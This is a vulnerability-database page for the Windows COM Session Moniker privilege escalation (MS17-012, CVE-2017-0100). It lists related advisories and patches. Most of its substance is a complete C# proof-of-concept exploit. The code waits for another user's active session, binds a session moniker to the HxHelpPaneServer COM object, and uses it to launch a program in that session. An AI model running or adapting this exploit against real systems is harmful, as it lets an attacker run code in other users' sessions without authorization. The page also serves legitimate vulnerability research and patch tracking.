Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MS17-012:Windows COM Session Moniker EoP(CVE-2017-0100)

🗓️ 15 Mar 2017 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 84 Views

COM session moniker in Windows allows DCOM object instantiation in a different user sessio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012) Exploit
16 Mar 201700:00
zdt
0day.today		Microsoft Windows COM Session Moniker Privilege Escalation Exploit
14 Jul 201700:00
zdt
BDU FSTEC		The vulnerability of the Windows operating system, which allows a hacker to increase their privileges
31 Mar 201700:00
bdu_fstec
Circl		CVE-2017-0100
15 Mar 201700:00
circl
CNVD		Microsoft Windows HelpPane Elevation of Privilege Vulnerability
16 Mar 201700:00
cnvd
Check Point Advisories		Microsoft Windows COM Elevation of Privilege (MS17-012: CVE-2017-0100)
14 Mar 201700:00
checkpoint_advisories
CVE		CVE-2017-0100
17 Mar 201700:00
cve
Cvelist		CVE-2017-0100
17 Mar 201700:00
cvelist
Microsoft KB		March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1
14 Mar 201707:00
mskb
Microsoft KB		March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2
14 Mar 201707:00
mskb
Rows per page

                                                /*
参考另外的 PoC:
COM Session Moniker EoP Exploit running within MSBuild.exe:
https://github.com/Cn33liz/MS17-012

 Author and founder of the MSBuild Application Whitelisting Bypass code: Casey Smith, Twitter: @subTee More Info: http://subt0x10.blogspot.nl/2016/09/bypassing-application-whitelisting.html

Author and founder of the COM Session Moniker EoP Exploit: James Forshaw, Twitter: @tiraniddo More Info: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021

*/
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;

namespace PoC_SessionMoniker_EoP
{
    class Program
    {
        [ComImport, Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
        interface IHxHelpPaneServer
        {
            void DisplayTask(string task);
            void DisplayContents(string contents);
            void DisplaySearchResults(string search);
            void Execute([MarshalAs(UnmanagedType.LPWStr)] string file);
        }

        enum WTS_CONNECTSTATE_CLASS
        {
            WTSActive,              // User logged on to WinStation
            WTSConnected,           // WinStation connected to client
            WTSConnectQuery,        // In the process of connecting to client
            WTSShadow,              // Shadowing another WinStation
            WTSDisconnected,        // WinStation logged on without client
            WTSIdle,                // Waiting for client to connect
            WTSListen,              // WinStation is listening for connection
            WTSReset,               // WinStation is being reset
            WTSDown,                // WinStation is down due to error
            WTSInit,                // WinStation in initialization
        }

        [StructLayout(LayoutKind.Sequential)]
        struct WTS_SESSION_INFO
        {
            public int SessionId;
            public IntPtr pWinStationName;
            public WTS_CONNECTSTATE_CLASS State;
        }

        [DllImport("wtsapi32.dll", SetLastError = true)]
        static extern bool WTSEnumerateSessions(
                IntPtr hServer,
                int Reserved,
                int Version,
                out IntPtr ppSessionInfo,
                out int pCount);

        [DllImport("wtsapi32.dll", SetLastError = true)]
        static extern void WTSFreeMemory(IntPtr memory);

        public static IEnumerable<int> GetSessionIds()
        {
            List<int> sids = new List<int>();
            IntPtr pSessions = IntPtr.Zero;
            int dwSessionCount = 0;
            try
            {
                if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, out pSessions, out dwSessionCount))
                {
                    IntPtr current = pSessions;
                    for (int i = 0; i < dwSessionCount; ++i)
                    {
                        WTS_SESSION_INFO session_info = (WTS_SESSION_INFO)Marshal.PtrToStructure(current, typeof(WTS_SESSION_INFO));
                        
                        if (session_info.State == WTS_CONNECTSTATE_CLASS.WTSActive)
                        {
                            if (session_info.SessionId != 0)
                            {
                                sids.Add(session_info.SessionId);
                            }
                        }
                        current += Marshal.SizeOf(typeof(WTS_SESSION_INFO));
                    }
                }
            }
            finally
            {
                if (pSessions != IntPtr.Zero)
                {
                    WTSFreeMemory(pSessions);
                }
            }

            return sids;
        }

        static void Main(string[] args)
        {
            try
            {
                int current_session_id = Process.GetCurrentProcess().SessionId;
                int new_session_id = 0;
                Console.WriteLine("Waiting For a Target Session");
                while (true)
                {
                    IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
                    if (sessions.Count() > 0)
                    {
                        new_session_id = sessions.First();
                        break;
                    }
                    Thread.Sleep(1000);
                }
                
                Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
                Thread.Sleep(20000);
                IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
                Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
                server.Execute(target.AbsoluteUri);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Mar 2017 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.04957
windowscomdcomsessionmonikerinstantiationuser sessionprivilege escalationexploitcve-2017-0100
84